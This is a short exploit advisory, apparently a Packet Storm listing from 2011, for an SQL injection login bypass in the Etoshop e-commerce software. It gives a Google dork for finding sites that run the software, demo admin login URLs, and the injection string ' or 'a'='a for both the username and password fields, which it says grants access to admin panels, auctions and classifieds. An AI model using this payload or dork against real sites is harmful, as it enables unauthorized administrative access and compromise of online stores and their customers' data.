Etoshop SQL Injection

🗓️ 13 Jul 2011 00:00:00Reported by r007k17-wType

packetstorm🔗 packetstormsecurity.com👁 16 Views

Etoshop SQL Injection Vulnerability, Auth Bypass, Admin Panel Acces

` %+  
$.......#........4.........|)........0............\/\/ %+  
  
%+  
%+  
  
  
%++++++++++++++++++++++++++++++++++++++++  
  
  
# Exploit Title: Etoshop(Auth Bypass) SQLi Vulnerability  
# Vendor: http://www.etoshop.com  
# Date: 12th july,2011  
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D (  
http://www.shadowrootkit.wordpress.com)  
# Google Dork: ©2000 INNER ESTEEM SDN BHD  
*****************************************************************************************************************************************  
*****************************************************************************************************************************************  
  
(Auth ByPass) SQLi Vulnerability  
***************************************  
{DEMO} : http://www.etoshop.com/demo/pcstore/admin.asp  
http://www.etoshop.com/demo/sbd-login.asp  
http://www.etoshop.com/demo/cac-login.asp  
http://www.etoshop.com/demo/csf-login.asp  
EXPLOIT:  
Username: ' or 'a'='a  
Password: ' or 'a'='a  
Observe: Attackers can use Authentication Bypass to get into Admin  
Panel,storebuilder,c2c auction,classifieds in the site.  
  
********************************************************************************************************************************************  
gr33t1ngs to s1d3 effects and my friends@!3.14--  
********************************************************************************************************************************************  
`

13 Jul 2011 00:00Current

0.1Low risk

Vulners AI Score0.1